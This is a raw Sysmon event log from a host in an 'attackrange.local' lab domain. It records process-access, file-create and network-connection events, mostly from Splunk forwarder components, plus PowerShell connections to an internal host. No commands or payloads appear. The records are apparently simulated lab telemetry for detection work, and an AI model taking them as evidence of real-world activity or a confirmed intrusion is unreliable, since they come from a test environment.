13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.123{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:24.093{B81B27B7-A24C-6140-B556-04000000C801}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:25.453{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAAFBBF5EAE3392935418B2D751DFF8,SHA256=CFBB785AA91DE5AD1DF303694221400964A85DEE867291F061F7D996A0FA093C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:25.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E2E0F9DEA7EC411B6A13B643EE8F5C0,SHA256=463BBDBCC058CB3E839408118F34151F9BDBB5FF78432E35124EBAA29F81E896,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:25.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CD1B6D58666F2F50C0111432A65EBBE,SHA256=0DDFAC7884564DC3DD86FE4ABFE2970C3BB3DD53BD3FF87B066ADEC12BC14639,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:55.946{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50681-false10.0.1.12-8000- 23542300x800000000000000036498725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:26.505{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=454090791F4F9A7EC154937537BE8CC0,SHA256=A1868624455EA7E36EBAE901D5CCC855A97178C2D632A7AE7B2AF9B3A99243FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:27.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=487028DECF8B00B8BDB67EEAD0511ECB,SHA256=02D049DFDC8DDC709B31223BF0E6E41EA019FEDA86616367A86579398FD73322,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:28.550{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DD52FD3142CD06ACBD5E947084BAEBEA,SHA256=7F70685ACCD0F088D62A2DADB12C410A5C386CA3AB8E1B33CC7D5C3D721122D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:28.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C3955920F4F722E633274121EEC4D81,SHA256=CBC8E63CCD6370B30D1B37BE3FF70168301EDE3A8AB9CA70D91FB6656F836B72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:29.567{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9755E9B9184947520E3AE353EC5AC5C4,SHA256=A096FD764C4D342DFEDBC11AE76183485D02A1E5648DA1ADB26E26DE86DB4DF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:59.227{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50682-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:30.585{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADBD7232E177E724C3D458699AB6C090,SHA256=CBFECB65665383CC6E8810879204673807C21F1553AC40B10C95A63F83DAF1BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C25D9217293128359CED53A8C57F6BF,SHA256=E4032FA8D573E735A14108FF8C2DD3CAF906ECC238E43374DD63CAA049B4F120,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a47|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000036498736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419b2|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000036498735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000036498734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x800000000000000036498733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF8a385874.TMPMD5=80D2028940892EB0B825AD2D8C8015CA,SHA256=4DD349D08FFD72024F455B053513402E406D7132CA573412DC85EEBC52CFD7A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:32.733{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F33BF51CCBED0DD66AB66849882E334,SHA256=5D4C8F7D0B65F43E4AD0BC5497C309C9BCA0366F00E3BB8FF17BA0312861FCE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:32.686{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:01.792{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50683-false10.0.1.12-8000- 354300x800000000000000036498743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:04.355{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50684-false10.0.1.12-8089- 23542300x800000000000000036498742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:33.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B1666BB142F9B6615FBFD52F841978,SHA256=D7DF7E54C0A354F3C37198484F07F0B617E455CE9F69C1064BFC39348FC1A5D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:05.240{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50685-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:34.768{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E10710FAB8B3A01A41E3883AC3B80D7,SHA256=74758F5500C77CCC0C06A13424AF7A9F74C52DD9FE2BFBFE9B97182C267EA01C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:34.566{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BA1CE851F9FE817C3182CE134E5E7839,SHA256=6A6422C2A2E3C91A1135656ECCE1676EACED7E4765D8495A067D302A319EF55C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:35.814{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45347355B748E243BA48F0D52B1271D1,SHA256=9F12AA1BE194C20B9F134B354CF277994B647D31BF27D6F3C5ABD0D38AD6A70E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:36.844{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB2882B5A155D9C8FC729A272C921F7,SHA256=145281B2A2B8A9593C825D2BC7E7F8B557241C9FC66905829932D91DAC2CC0E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.964{B81B27B7-A259-6140-B756-04000000C801}55645776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.862{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13A2CF6201C51B1D076FEFC69A4FDEC,SHA256=4BEDEA38D11C8B03053EFAAF52C1EDBCF05D80C667F41E214352B3C3000EF74C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 